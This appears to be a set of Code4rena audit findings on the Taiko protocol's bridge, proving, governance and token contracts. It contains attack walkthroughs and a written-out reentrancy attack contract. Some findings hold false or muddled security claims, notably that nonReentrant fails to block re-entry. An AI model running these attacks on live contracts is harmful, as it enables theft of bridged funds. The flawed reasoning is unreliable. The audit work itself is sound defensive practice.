    function _isInstanceValid(uint256 id, address instance) private view returns (bool) {
        if (instance == address(0)) return false;
        if (instance != instances[id].addr) return false;
->      return instances[id].validSince <= block.timestamp
            && block.timestamp <= instances[id].validSince + INSTANCE_EXPIRY;
    }

If Alice proposes a proof and Bob sees that this proof is not valid and Bob wants to contest that block at 179 days, he won't be able to since the proving has been paused. After it has been unpaused, the INSTANCE_EXPIRY will be over, and Bob won't be able to contest the proof of Alice, rendering the use-case of contestation not usable in this case.

Tools Used

Manual Review

Recommended Mitigation Steps

Take a snapshot when of the block.timestamp when proving is paused and another snapshot when it's unpaused, use that difference to add it to INSTANCE_EXPIRY.

Assessed type

Context

QA Report

See the markdown file with the details of this report here.

Lack of Verification for Destination Chain Header Hash in proveSignalReceived Function

Lines of code

https://github.com/code-423n4/2024-03-taiko/blob/a30b5b6afd121e4de8ceff7165a2091e62194992/packages/protocol/contracts/bridge/Bridge.sol#L577-L593
https://github.com/code-423n4/2024-03-taiko/blob/a30b5b6afd121e4de8ceff7165a2091e62194992/packages/protocol/contracts/signal/SignalService.sol#L83-L134

Vulnerability details

Impact

The lack of verification for the header hash on the destination chain height in the proveSignalReceived function could lead to a scenario where the proof data is valid, but the signal was not actually received on the destination chain as claimed. This could result in incorrect verification of cross-chain communication, leading to erroneous conclusions about the state of the system.

Proof of Concept

The proveSignalReceived function in the SignalService contract is designed to validate the integrity of proof data provided as input, confirming that a signal was received correctly on the destination chain. According to the documentation, this function is supposed to retrieve the header hash on the destination chain corresponding to the specified header height in the proof and then compare it against the hash provided in the proof. However, within the contract's implementation, this crucial step of verifying the header hash on the destination chain is not enforced.

While the documentation outlines the intended behavior of the proveSignalReceived function, the absence of code within the contract to enforce this verification represents a vulnerability. Without this verification step, there's no guarantee that the signal was actually received on the destination chain, even if the proof data is valid. As a result, the integrity and correctness of cross-chain communication verification are compromised.

Tools Used

Manual

Recommended Mitigation Steps

Update the proveSignalReceived function to include the necessary verification step for the header hash on the destination chain.

Assessed type

Context

unchecked loop increments no valid in solidity `> v0.8.22`

Lines of code

https://github.com/code-423n4/2024-03-taiko/blob/a30b5b6afd121e4de8ceff7165a2091e62194992/packages/protocol/contracts/thirdparty/optimism/trie/MerkleTrie.sol#L210-L212
https://github.com/code-423n4/2024-03-taiko/blob/a30b5b6afd121e4de8ceff7165a2091e62194992/packages/protocol/contracts/L1/libs/LibDepositing.sol#L103-L104

Vulnerability details

Impact

The new optimization in v0.8.22 removes the need for poor unchecked increment patterns in for loop bodies such

Proof of Concept

Solidity 0.8.22 introduces an overflow check optimization that automatically generates an unchecked arithmetic increment of the counter of for loops.

Tools Used

manual

Recommended Mitigation Steps

do not use ++i in >v0.8.22

Assessed type

Other

Unbounded loop in ERC721Airdrop contract may cause the claim() function to fail

Lines of code

https://github.com/code-423n4/2024-03-taiko/blob/b6885955903c4ec6a0d72ebb79b124c6d0a1002b/packages/protocol/contracts/team/airdrop/ERC721Airdrop.sol#L47

Vulnerability details

Summary

The claim() function iterates over the tokenIds array using a for loop, transferring each token from the vault address to the user address. This is done using the safeTransferFrom() function.

However, there are no bounds on the number of tokens claimable in the claim() function, and gas requirements can change or with the provided tokens if the tokens use a lot of gas during their claiming process.

Proof of Concept

    function claim(
        address user,
        uint256[] calldata tokenIds,
        bytes32[] calldata proof
    )
        external
        nonReentrant
    {
        // Check if this can be claimed
        _verifyClaim(abi.encode(user, tokenIds), proof);


        // Transfer the tokens
        for (uint256 i; i < tokenIds.length; ++i) { // @audit unbounded loop
            IERC721(token).safeTransferFrom(vault, user, tokenIds[i]);
        }
    }

There are no upper bounds on the number of assets being transferred in this loop. With a large enough size of the tokenIds array, the function will iterate through the whole length of this array retrieving each token and in the event that the token being retrieved is located at the very end of the array, the function may eventually run out gas and revert.

Impact

As a result of this, the user of the tokens will be unable to get the assets they are owed.

Tools Used

Manual Review

Recommended Mitigation Steps

Have an upper bound on the number of assets, or allow them to be transferred out one at a time, if necessary

Assessed type

DoS

Agreements & Disclosures

Agreements

If you are a C4 Certified Contributor by commenting or interacting with this repo prior to public release of the contest report, you agree that you have read the Certified Warden docs and agree to be bound by:

To signal your agreement to these terms, add a 👍 emoji to this issue.

Code4rena staff reserves the right to disqualify anyone from this role and similar future opportunities who is unable to participate within the above guidelines.

Disclosures

Sponsors may elect to add team members and contractors to assist in sponsor review and triage. All sponsor representatives added to the repo should comment on this issue to identify themselves.

To ensure contest integrity, the following potential conflicts of interest should also be disclosed with a comment in this issue:

  1. any sponsor staff or sponsor contractors who are also participating as wardens
  2. any wardens hired to assist with sponsor review (and thus presenting sponsor viewpoint on findings)
  3. any wardens who have a relationship with a judge that would typically fall in the category of potential conflict of interest (family, employer, business partner, etc)
  4. any other case where someone might reasonably infer a possible conflict of interest.

Bridge::suspendMessages() does not check the status of the message before marking as suspended

Lines of code

https://github.com/code-423n4/2024-03-taiko/blob/a30b5b6afd121e4de8ceff7165a2091e62194992/packages/protocol/contracts/bridge/Bridge.sol#L82-L95

Vulnerability details

Impact

Messages over the bridge moves from one status to another based on their current status of processing.

While making the message as suspended, the logic does not check the current status of the message. Messages that are DONE, FAILED or RECALLED should not be suspend-able as those messages have reach their end state.

     enum Status {
        NEW,
        RETRIABLE,
        DONE,
        FAILED,
        RECALLED
    }

Proof of Concept

The logic updates the receiveAt time stamp for msgHash without evaluating the status of the message at that time of calling suspendMessages.

    function suspendMessages(
        bytes32[] calldata _msgHashes,
        bool _suspend
    )
        external
        onlyFromOwnerOrNamed("bridge_watchdog")
    {
        uint64 _timestamp = _suspend ? type(uint64).max : uint64(block.timestamp);
        for (uint256 i; i < _msgHashes.length; ++i) {
            bytes32 msgHash = _msgHashes[i];
            proofReceipt[msgHash].receivedAt = _timestamp;
            emit MessageSuspended(msgHash, _suspend);
        }
    }

Tools Used

Manual Review

Recommended Mitigation Steps

Revise the logic to check for the status of the message. Only messages that are not yet processed to final state should be consider for suspension.

For messages that failed, recalled or done should not be marked for suspension.

Assessed type

Other

Potential Access Control Vulnerability in Bond Management during Proof Contestation and Tier Transitions

Lines of code

https://github.com/code-423n4/2024-03-taiko/blob/a30b5b6afd121e4de8ceff7165a2091e62194992/packages/protocol/contracts/L1/libs/LibProving.sol#L207
https://github.com/code-423n4/2024-03-taiko/blob/a30b5b6afd121e4de8ceff7165a2091e62194992/packages/protocol/contracts/L1/libs/LibProving.sol#L350-L398

Vulnerability details

Impact

The identified vulnerability within LibProving.sol presents a medium-severity risk, primarily affecting the integrity and fairness of the proof contestation process and tier transitions. Key impacts include:

  • Integrity Risk: Potential manipulation of proof submissions could compromise the validation process's fairness, granting unfair advantages in block contestations.

  • Bond Mismanagement: Inadequate access control might allow unauthorized bond manipulation, disturbing the equitable management of prover collateral without direct financial theft.

  • Operational Disruption: Exploitation could disrupt protocol operations, affecting user confidence and participation due to unjust contestations or proof overrides.

Despite limited direct financial risk, the vulnerability's implications for process integrity and trust warrant its classification as medium severity, necessitating prompt remediation to uphold protocol standards.

Proof of Concept

Proof of Concept for Medium-Severity Vulnerability in LibProving.sol

Scenario: Bob aims to exploit a flaw in the bond management logic during proof contestation against Alice, who has submitted a valid high-tier proof.

Key Code Interaction:

  • Alice's Submission: Handled by proveBlock, where Alice's bond and tier are initially validated.
  • Bob's Exploit: Utilizes _overrideWithHigherProof (LibProving.sol#L350-L398), aiming at the inadequate tier and access control checks.

Exploitation Path:

  1. Initial Setup: Alice submits a high-tier proof, locking a significant validity bond as part of the submission process within the proveBlock function.

  2. Vulnerability Identification: Bob discovers a loophole in the _overrideWithHigherProof function that improperly handles tier validations and permissions during proof contestations.

  3. Malicious Action: Leveraging this flaw, Bob submits a new proof for the same block, targeting the same or slightly lower tier than Alice, to trigger the vulnerable bond management logic.

  4. Outcome: The system incorrectly processes Bob's submission, affecting Alice's bond and potentially her proof's status due to the flawed _overrideWithHigherProof logic. This results in either unjust bond reallocation or contestation, undermining the fairness and integrity of the proof validation process.

Recommended Mitigation Steps

Strengthen validation within _overrideWithHigherProof to ensure strict tier and authorization verification.

Assessed type

Access Control

suspendMessages() sets incorrect `receivedAt` timestamp which enables user to bypass `_proof`

Lines of code

https://github.com/code-423n4/2024-03-taiko/blob/main/packages/protocol/contracts/bridge/Bridge.sol#L89-L92

Vulnerability details

Summary & Impact

Even for unproven messages, the value of receivedAt can be set to a non-zero value inside suspendMessages() due to incomplete validation.

Whenever a message is unsuspended, the protocol does not check for it's previous proven/unproven status. So even if the message is unproven and receivedAt is supposed to be zero, the unsuspension sets it to block.timestamp. This practically acts as marking the message as proven, thus enabling a user to bypass important checks and:

  • perform the function calls processMessage() and recallMessage() without a valid _proof.
  • process a message even when its _proveSignalReceived = false.
  • get tokens/ether credited without actually proving it.
  • recall the message & get back ether even though the message never failed.

Details

Consider the following flow of events:

  • Alice sends a message.
  • Owner calls suspendMessages() to suspend Alice's message i.e. _suspend = true.
  • Soon after, owner calls suspendMessages() to un-suspend Alice's message i.e. _suspend = false.
    • Note that owner may even directly un-suspend the message, even though it was never in a suspended state initially (basically skipping step-2) as there is no check which ensures that only a suspended message is allowed to be unsuspended. But that would be quite illogical to do, so we've assumed a valid flow of events.
  • Alice's message, which had not yet been proven and still had a receivedAt = 0, now is incorrectly assigned receivedAt = block.timestamp on L92.
  • Two attack vectors can now be carried out:
    • Attack Vector - 1:

      • User now calls processMessage() with an invalid _proof.
      • The if condition on L235 is bypassed since the message is incorrectly considered 'proven' by the protocol on L231. Hence it is never checked on L236 if the message signal was really received.
      • Funds are drained on L294-L300.
    • Attack Vector - 2:

      • User now calls recallMessage() with an invalid _proof.
      • The if condition on L171 is bypassed since the message is incorrectly considered 'proven' by the protocol on L169. Hence it is never checked on L179 if the message really failed.
      • Alice receives her ether back either on L199 or on L206.
      • There's an additional griefing attack vector possible here:
        • A griefer can call recallMessage() (even front-running an authentic processMessage() by the message owner) at timestamp = invocationDelay + receivedAt and cause the message status to be changed to RECALLED, thus disallowing any future chances of a processMessage() call. Note that the griefer need not provide a valid _proof now since the check on L179 does not ever happen.

Click to view relevant code snippets
  File: protocol/contracts/bridge/Bridge.sol

  155:              function recallMessage(
  156:                  Message calldata _message,
  157:                  bytes calldata _proof
  158:              )
  159:                  external
  160:                  nonReentrant
  161:                  whenNotPaused
  162:                  sameChain(_message.srcChainId)
  163:              {
  164:                  bytes32 msgHash = hashMessage(_message);
  165:
  166:                  if (messageStatus[msgHash] != Status.NEW) revert B_STATUS_MISMATCH();
  167:
  168:                  uint64 receivedAt = proofReceipt[msgHash].receivedAt;
  169: @--->            bool isMessageProven = receivedAt != 0;
  170:
  171: @--->            if (!isMessageProven) {
  172:                      address signalService = resolve("signal_service", false);
  173:
  174:                      if (!ISignalService(signalService).isSignalSent(address(this), msgHash)) {
  175:                          revert B_MESSAGE_NOT_SENT();
  176:                      }
  177:
  178:                      bytes32 failureSignal = signalForFailedMessage(msgHash);
  179: @--->                if (!_proveSignalReceived(signalService, failureSignal, _message.destChainId, _proof)) {
  180:                          revert B_NOT_FAILED();
  181:                      }
  182:
  183:                      receivedAt = uint64(block.timestamp);
  184:                      proofReceipt[msgHash].receivedAt = receivedAt;
  185:                  }
  186:
  187:                  (uint256 invocationDelay,) = getInvocationDelays();
  188:
  189:                  if (block.timestamp >= invocationDelay + receivedAt) {
  190:                      delete proofReceipt[msgHash];
  191:                      messageStatus[msgHash] = Status.RECALLED;
  192:
  193:                      // Execute the recall logic based on the contract's support for the
  194:                      // IRecallableSender interface
  195:                      if (_message.from.supportsInterface(type(IRecallableSender).interfaceId)) {
  196:                          _storeContext(msgHash, address(this), _message.srcChainId);
  197:
  198:                          // Perform recall
  199: @--->                    IRecallableSender(_message.from).onMessageRecalled{ value: _message.value }(
  200:                              _message, msgHash
  201:                          );
  202:
  203:                          // Must reset the context after the message call
  204:                          _resetContext();
  205:                      } else {
  206: @--->                    _message.srcOwner.sendEther(_message.value);
  207:                      }
  208:                      emit MessageRecalled(msgHash);
  209:                  } else if (!isMessageProven) {
  210:                      emit MessageReceived(msgHash, _message, true);
  211:                  } else {
  212:                      revert B_INVOCATION_TOO_EARLY();
  213:                  }
  214:              }
  215:
  216:              /// @inheritdoc IBridge
  217:              function processMessage(
  218:                  Message calldata _message,
  219:                  bytes calldata _proof
  220:              )
  221:                  external
  222:                  nonReentrant
  223:                  whenNotPaused
  224:                  sameChain(_message.destChainId)
  225:              {
  226:                  bytes32 msgHash = hashMessage(_message);
  227:                  if (messageStatus[msgHash] != Status.NEW) revert B_STATUS_MISMATCH();
  228:
  229:                  address signalService = resolve("signal_service", false);
  230:                  uint64 receivedAt = proofReceipt[msgHash].receivedAt;
  231: @--->            bool isMessageProven = receivedAt != 0;
  232:
  233:                  (uint256 invocationDelay, uint256 invocationExtraDelay) = getInvocationDelays();
  234:
  235: @--->            if (!isMessageProven) {
  236:                      if (!_proveSignalReceived(signalService, msgHash, _message.srcChainId, _proof)) {
  237:                          revert B_NOT_RECEIVED();
  238:                      }
  239:
  240:                      receivedAt = uint64(block.timestamp);
  241:
  242:                      if (invocationDelay != 0) {
  243: @--->                    proofReceipt[msgHash] = ProofReceipt({
  244:                              receivedAt: receivedAt,
  245:                              preferredExecutor: _message.gasLimit == 0 ? _message.destOwner : msg.sender
  246:                          });
  247:                      }
  248:                  }
  249:
  250:                  if (invocationDelay != 0 && msg.sender != proofReceipt[msgHash].preferredExecutor) {
  251:                      // If msg.sender is not the one that proved the message, then there
  252:                      // is an extra delay.
  253:                      unchecked {
  254:                          invocationDelay += invocationExtraDelay;
  255:                      }
  256:                  }
  257:
  258:                  if (block.timestamp >= invocationDelay + receivedAt) {
  259:                      // If the gas limit is set to zero, only the owner can process the message.
  260:                      if (_message.gasLimit == 0 && msg.sender != _message.destOwner) {
  261:                          revert B_PERMISSION_DENIED();
  262:                      }
  263:
  264:                      delete proofReceipt[msgHash];
  265:
  266:                      uint256 refundAmount;
  267:
  268:                      // Process message differently based on the target address
  269:                      if (
  270:                          _message.to == address(0) || _message.to == address(this)
  271:                              || _message.to == signalService || addressBanned[_message.to]
  272:                      ) {
  273:                          // Handle special addresses that don't require actual invocation but
  274:                          // mark message as DONE
  275:                          refundAmount = _message.value;
  276:                          _updateMessageStatus(msgHash, Status.DONE);
  277:                      } else {
  278:                          // Use the specified message gas limit if called by the owner, else
  279:                          // use remaining gas
  280:                          uint256 gasLimit = msg.sender == _message.destOwner ? gasleft() : _message.gasLimit;
  281:
  282:                          if (_invokeMessageCall(_message, msgHash, gasLimit)) {
  283:                              _updateMessageStatus(msgHash, Status.DONE);
  284:                          } else {
  285:                              _updateMessageStatus(msgHash, Status.RETRIABLE);
  286:                          }
  287:                      }
  288:
  289:                      // Determine the refund recipient
  290:                      address refundTo =
  291:                          _message.refundTo == address(0) ? _message.destOwner : _message.refundTo;
  292:
  293:                      // Refund the processing fee
  294:                      if (msg.sender == refundTo) {
  295:                          refundTo.sendEther(_message.fee + refundAmount);
  296:                      } else {
  297:                          // If sender is another address, reward it and refund the rest
  298:                          msg.sender.sendEther(_message.fee);
  299:                          refundTo.sendEther(refundAmount);
  300:                      }
  301:                      emit MessageExecuted(msgHash);
  302:                  } else if (!isMessageProven) {
  303:                      emit MessageReceived(msgHash, _message, false);
  304:                  } else {
  305:                      revert B_INVOCATION_TOO_EARLY();
  306:                  }
  307:              }
  File: protocol/contracts/bridge/Bridge.sol

  79:               /// @notice Suspend or unsuspend invocation for a list of messages.
  80:               /// @param _msgHashes The array of msgHashes to be suspended.
  81:               /// @param _suspend True if suspend, false if unsuspend.
  82:               function suspendMessages(
  83:                   bytes32[] calldata _msgHashes,
  84:                   bool _suspend
  85:               ) 
  86:                   external
  87:                   onlyFromOwnerOrNamed("bridge_watchdog")
  88:               {
  89:  @--->            uint64 _timestamp = _suspend ? type(uint64).max : uint64(block.timestamp);  
  90:                   for (uint256 i; i < _msgHashes.length; ++i) {
  91:                       bytes32 msgHash = _msgHashes[i];
  92:  @--->                proofReceipt[msgHash].receivedAt = _timestamp;
  93:                       emit MessageSuspended(msgHash, _suspend);
  94:                   }
  95:               }

Tools Used

Manual review

Recommended Mitigation Steps

Introduce a new boolean mapping isProven[msgHash] which stores whether the message was proven or not before being suspended/unsuspended.

    function suspendMessages(
        bytes32[] calldata _msgHashes,
        bool _suspend
    )
        external
        onlyFromOwnerOrNamed("bridge_watchdog")
    {
        uint64 _timestamp = _suspend ? type(uint64).max : uint64(block.timestamp);
        for (uint256 i; i < _msgHashes.length; ++i) {
            bytes32 msgHash = _msgHashes[i];
            proofReceipt[msgHash].receivedAt = _timestamp;
+           if (!isProven[msgHash] && !_suspend) proofReceipt[msgHash].receivedAt = 0;  // set it to zero if unsuspension of an unproven message is being done
            emit MessageSuspended(msgHash, _suspend);
        }
    }


    ...
    ...


    function recallMessage(
        Message calldata _message,
        bytes calldata _proof
    )
        external
        nonReentrant
        whenNotPaused
        sameChain(_message.srcChainId)
    {
        bytes32 msgHash = hashMessage(_message);

        if (messageStatus[msgHash] != Status.NEW) revert B_STATUS_MISMATCH();

        uint64 receivedAt = proofReceipt[msgHash].receivedAt;
        bool isMessageProven = receivedAt != 0;
+       if (receivedAt != type(uint64).max) isProven[msgHash] = isMessageProven;  // if not suspended, update `isProven`

        if (!isMessageProven) {
            address signalService = resolve("signal_service", false);


    ...
    ...


    function processMessage(
        Message calldata _message,
        bytes calldata _proof
    )
        external
        nonReentrant
        whenNotPaused
        sameChain(_message.destChainId)
    {
        bytes32 msgHash = hashMessage(_message);
        if (messageStatus[msgHash] != Status.NEW) revert B_STATUS_MISMATCH();

        address signalService = resolve("signal_service", false);
        uint64 receivedAt = proofReceipt[msgHash].receivedAt;
        bool isMessageProven = receivedAt != 0;
+       if (receivedAt != type(uint64).max) isProven[msgHash] = isMessageProven;  // if not suspended, update `isProven`

        (uint256 invocationDelay, uint256 invocationExtraDelay) = getInvocationDelays();

        if (!isMessageProven) {
            if (!_proveSignalReceived(signalService, msgHash, _message.srcChainId, _proof)) {

Assessed type

Invalid Validation

TaikoGovernor::propose does not check for threshold votes before submitting a proposal

Lines of code

https://github.com/code-423n4/2024-03-taiko/blob/a30b5b6afd121e4de8ceff7165a2091e62194992/packages/protocol/contracts/L1/gov/TaikoGovernor.sol#L48-L59
https://github.com/code-423n4/2024-03-taiko/blob/a30b5b6afd121e4de8ceff7165a2091e62194992/packages/protocol/contracts/L1/gov/TaikoGovernor.sol#L69-L86

Vulnerability details

Impact

In order to submit a proposal to TaikoGovernor, the account should have a minimum number of votes per the threshold set by the contract. Per the implementation, there should be 0.01% of Taiko Token to be held by the proposer at the time of submitting the proposal.

But, both the propose functions does not check for the msg.sender to meet the votes threshold criteria.

The proposal is a responsible action and should be restricted to qualified accounts that have stake in the protocol. Allowing any one to submit proposal opens to abuse by evil parties.

Proof of Concept

Proposal function of TaikoGovernor does not have a validation on the threshold votes before allowing submission of proposal.

 function propose(
        address[] memory _targets,
        uint256[] memory _values,
        bytes[] memory _calldatas,
        string memory _description
    )
        public
        override(IGovernorUpgradeable, GovernorUpgradeable, GovernorCompatibilityBravoUpgradeable)
        returns (uint256)
    {
        return super.propose(_targets, _values, _calldatas, _description);
    }
 function propose(
        address[] memory _targets,
        uint256[] memory _values,
        string[] memory _signatures,
        bytes[] memory _calldatas,
        string memory _description
    )
        public
        virtual
        override(GovernorCompatibilityBravoUpgradeable)
        returns (uint256)
    {
        if (_signatures.length != _calldatas.length) revert TG_INVALID_SIGNATURES_LENGTH();

        return GovernorCompatibilityBravoUpgradeable.propose(
            _targets, _values, _signatures, _calldatas, _description
        );
    }

Tools Used

Manual review

Recommended Mitigation Steps

Add validation condition to verify that msg.sender has the required votes to meet the threshold criteria before allow for submission of proposal to the TaikoGovernor.

Assessed type

Governance

TimelockTokenPool::grant() blocks additional grants if _recipient has grant balance

Lines of code

https://github.com/code-423n4/2024-03-taiko/blob/a30b5b6afd121e4de8ceff7165a2091e62194992/packages/protocol/contracts/team/TimelockTokenPool.sol#L135-L144

Vulnerability details

Impact

Grants will be given to recipients on periodic basis, but the current validation logic in grant function will not allow a recipient to receive another grant until the amount is 0.

That means there is only one grant possible or the previous grant has been voided resulting in grant amount becoming 0. With the current implementation, the ability for a recipient to receive grant is limited to only one time.

    if (recipients[_recipient].grant.amount != 0) revert ALREADY_GRANTED();

Proof of Concept

   function grant(address _recipient, Grant memory _grant) external onlyOwner {
        if (_recipient == address(0)) revert INVALID_PARAM();
        if (recipients[_recipient].grant.amount != 0) revert ALREADY_GRANTED();

        _validateGrant(_grant);

        totalAmountGranted += _grant.amount;
        recipients[_recipient].grant = _grant;
        emit Granted(_recipient, _grant);
    }

Tools Used

Manual review

Recommended Mitigation Steps

If the recipient can receive grants on regular basis, then the above condition to check for grant amount to be 0 and revert should be removed.

Also, the update of the grant for the recipient should be updated to sum the previous amount with new grant. Otherwise the recipient will lose previous grant amount.

  recipients[_recipient].grant = _grant;

Assessed type

Timing

Double Deposit Exploit: Reentrancy Vulnerability in TaikoL1.sol

Lines of code

https://github.com/code-423n4/2024-03-taiko/blob/a30b5b6afd121e4de8ceff7165a2091e62194992/packages/protocol/contracts/L1/TaikoL1.sol#L117-L121

Vulnerability details

Impact

The impact of the reentrancy exploit in the depositEtherToL2 function of TaikoL1.sol is significant and can lead to financial loss for users and the contract itself. Here's a detailed breakdown of the potential consequences:

  1. Double Deposits: The most immediate impact is that an attacker could potentially double deposits. This means that if an attacker sends Ether to the MaliciousContract and calls the attack function, the fallback function will be triggered, which in turn calls the depositEtherToL2 function of TaikoL1. Since the fallback function is reentrant, it can call depositEtherToL2 again before the first call has finished executing, leading to the Ether being deposited twice.

  2. Loss of Funds: Users who interact with the TaikoL1 contract by depositing Ether could lose their funds due to the double deposit exploit. The contract's balance would increase due to the double deposit, but the user's balance within the contract would not reflect the actual amount of Ether they intended to deposit.

  3. Contract Vulnerability: The contract's vulnerability to reentrancy attacks could be exploited by malicious actors to drain the contract's funds. If the contract's balance is manipulated due to the double deposit exploit, an attacker could potentially withdraw more Ether than they should be able to.

Proof of Concept

To demonstrate a Proof of Concept (POC) for the reentrancy vulnerability in the depositEtherToL2 function of TaikoL1.sol, we'll create a malicious contract that exploits this vulnerability. This POC will illustrate how an attacker could potentially double deposits by calling the depositEtherToL2 function in the fallback function of their malicious contract.

Step 1: Create the Malicious Contract

First, we'll create a malicious contract that will exploit the reentrancy vulnerability in the depositEtherToL2 function. This contract will have a fallback function that calls the depositEtherToL2 function of TaikoL1.

// SPDX-License-Identifier: MIT
pragma solidity ^0.8.24;

import "./TaikoL1.sol";

contract MaliciousContract {
    TaikoL1 public taikoL1;
    address payable public attacker;

    constructor(TaikoL1 _taikoL1) {
        taikoL1 = _taikoL1;
        attacker = payable(msg.sender);
    }

    // Fallback function to exploit reentrancy
    fallback() external payable {
        if (address(taikoL1).balance >= msg.value) {
            taikoL1.depositEtherToL2{value: msg.value}(attacker);
        }
    }

    // Function to initiate the attack
    function attack() external payable {
        require(msg.value > 0, "Must send some Ether");
        taikoL1.depositEtherToL2{value: msg.value}(address(this));
    }

    // Function to withdraw the stolen Ether
    function withdraw() external {
        require(msg.sender == attacker, "Only the attacker can withdraw");
        payable(attacker).transfer(address(this).balance);
    }
}

Step 2: Deploy and Execute the Attack

  1. Deploy TaikoL1 and MaliciousContract: Deploy the TaikoL1 contract and the MaliciousContract with the address of the deployed TaikoL1 contract as a constructor argument.

  2. Initiate the Attack: Call the attack function of the MaliciousContract with some Ether. This will trigger the depositEtherToL2 function of TaikoL1, which in turn will call the fallback function of the MaliciousContract.

  3. Observe the Reentrancy: The fallback function of the MaliciousContract will again call the depositEtherToL2 function of TaikoL1, potentially leading to double deposits.

Recommended Mitigation Steps

To mitigate this reentrancy vulnerability, the depositEtherToL2 function in TaikoL1.sol should use the Checks-Effects-Interactions pattern and consider using the reentrancyGuard modifier from OpenZeppelin's ReentrancyGuard contract. This ensures that all state changes are made before calling external contracts, preventing reentrancy attacks.

import "@openzeppelin/contracts/security/ReentrancyGuard.sol";

contract TaikoL1 is EssentialContract, ITaikoL1, TaikoEvents, TaikoErrors, ReentrancyGuard {
    // Existing code...

    function depositEtherToL2(address _recipient) external payable nonReentrant whenNotPaused {
        // Implementation...
    }
}

By adding the nonReentrant modifier to the depositEtherToL2 function, we ensure that the function cannot be re-entered while it is still executing, thus mitigating the reentrancy vulnerability.

You may ask How that is even an exploit while we do have a modifier that prevents that?

The nonReentrant modifier from OpenZeppelin's ReentrancyGuard contract is designed to prevent reentrancy attacks by ensuring that a function cannot be re-entered while it is still executing. This modifier is typically used to protect functions that change the state of the contract and interact with external contracts, which are common targets for reentrancy attacks.

However, the nonReentrant modifier alone is not sufficient to secure the depositEtherToL2 function from all potential reentrancy attacks. The reason is that the nonReentrant modifier only prevents reentrancy after the state has been changed. If the state change occurs after the external call, and the external call triggers a reentrant call back into the function, the nonReentrant modifier will not prevent the reentrancy.

In the case of the depositEtherToL2 function, if the function sends Ether to an external contract (which could be a malicious contract) before the state change is made, and that external contract calls back into the depositEtherToL2 function, the nonReentrant modifier will not prevent the reentrancy.

To secure the function against reentrancy attacks, it is recommended to follow the Checks-Effects-Interactions pattern, which suggests that you should make any state changes in your function before calling external contracts. This way, even if a reentrant call is made, the state of the contract will have already been updated, and the reentrant call will not be able to change the state again.

Here's an example of how to apply the Checks-Effects-Interactions pattern in the depositEtherToL2 function:

function depositEtherToL2(address _recipient) external payable nonReentrant whenNotPaused {
    // Checks
    require(_recipient != address(0), "Invalid recipient");

    // Effects
    // Update the state of the contract here, before making the external call

    // Interactions
    // Make the external call here, after the state has been updated
    _recipient.transfer(msg.value);
}

By ensuring that the state is updated before making the external call, you can prevent reentrancy attacks even with the nonReentrant modifier in place.

Assessed type

Reentrancy

`_invokeMessageCall` is possible on banned addresses

Lines of code

https://github.com/code-423n4/2024-03-taiko/blob/main/packages/protocol/contracts/bridge/Bridge.sol#L101-L112

Vulnerability details

Description

The owner or the bridge_watchdog can ban an address by calling Bridge.banAddress():

    function banAddress(
        address _addr,
        bool _ban
    )
        external
        onlyFromOwnerOrNamed("bridge_watchdog")
        nonReentrant
    {
        if (addressBanned[_addr] == _ban) revert B_INVALID_STATUS();
        addressBanned[_addr] = _ban;
        emit AddressBanned(_addr, _ban);
    }

In Bridge.processMessage, there is a check that checks if the address in the _message.to field is banned. If it is banned, the message status gets updated to DONE;

function processMessage() {
//.. code ommited
            if (
                _message.to == address(0) || _message.to == address(this)
                    || _message.to == signalService || addressBanned[_message.to]
            ) {
                refundAmount = _message.value;
                _updateMessageStatus(msgHash, Status.DONE);
            } 
//.. code ommited
}

After setting the message to status DONE, a refund will happen to either the msg.sender or the refundTo address alongside a small fee for the msg.sender.

function processMessage() {
//.. code ommited
            address refundTo =
                _message.refundTo == address(0) ? _message.destOwner : _message.refundTo;
            if (msg.sender == refundTo) {
                refundTo.sendEther(_message.fee + refundAmount);
            } else {
                msg.sender.sendEther(_message.fee);
                refundTo.sendEther(refundAmount);
            }
//.. code ommited

This means that it should not be possible to call _invokeMessageCall onto a banned message since this is reserved for the else branch after the if-branch where the checks happened for the banned addresses:

function processMessage() {
//.. code ommited
            if (
                _message.to == address(0) || _message.to == address(this)
                    || _message.to == signalService || addressBanned[_message.to]
            ) {
                refundAmount = _message.value;
                _updateMessageStatus(msgHash, Status.DONE);
->          } else {
                uint256 gasLimit = msg.sender == _message.destOwner ? gasleft() : _message.gasLimit;
                if (_invokeMessageCall(_message, msgHash, gasLimit)) {
                    _updateMessageStatus(msgHash, Status.DONE);
                } else {
                    _updateMessageStatus(msgHash, Status.RETRIABLE);
                }
            }
//.. code ommited

However, it is still possible to call _invokeMessageCall onto a banned address.

Proof of Concept

Consider the following:

  • A message gets sent from src to destination
  • Message arrives at destination
  • Message becomes retriable
function processMessage() {
//.. code ommited
            } else {
                uint256 gasLimit = msg.sender == _message.destOwner ? gasleft() : _message.gasLimit;
                if (_invokeMessageCall(_message, msgHash, gasLimit)) {
                    _updateMessageStatus(msgHash, Status.DONE);
                } else {
->                  _updateMessageStatus(msgHash, Status.RETRIABLE);
                }
//.. code ommited
  • The address that is specified as _message.to gets banned by the bridge_watchdog:
    function banAddress(
        address _addr,
        bool _ban
    )
        external
        onlyFromOwnerOrNamed("bridge_watchdog")
        nonReentrant
    {
        if (addressBanned[_addr] == _ban) revert B_INVALID_STATUS();
        addressBanned[_addr] = _ban;
        emit AddressBanned(_addr, _ban);
    }
  • Since the _message.to got banned, it should not be possible to call _invokeMessageCall on _message.to.
  • However, this message can still be retried and it will succesfully call _invokeMessageCall because there are no checks for banned messages in retryMessage:
    function retryMessage(
        Message calldata _message,
        bool _isLastAttempt
    )
        external
        nonReentrant
        whenNotPaused
        sameChain(_message.destChainId)
    {
        if (_message.gasLimit == 0 || _isLastAttempt) {
            if (msg.sender != _message.destOwner) revert B_PERMISSION_DENIED();
        }
        bytes32 msgHash = hashMessage(_message);
        if (messageStatus[msgHash] != Status.RETRIABLE) {
            revert B_NON_RETRIABLE();
        }
        if (_invokeMessageCall(_message, msgHash, gasleft())) {
            _updateMessageStatus(msgHash, Status.DONE);
        } else if (_isLastAttempt) {
            _updateMessageStatus(msgHash, Status.FAILED);
        }
        emit MessageRetried(msgHash);
    }

This results in banned addresses still being able to be interacted with, which should not be the case since _invokeMessageCall is strictly prohibited from being called on these banned addresses.

Tools Used

Manual Review

Recommended Mitigation Steps

Handle retryMessage calls to banned addresses in the same way they are handled inside processMessage. That means to send a refund.

Assessed type

Timing

QA Report

See the markdown file with the details of this report here.

QA Report

See the markdown file with the details of this report here.

EIP3074 renders `msg.sender == tx.origin` useless

Lines of code

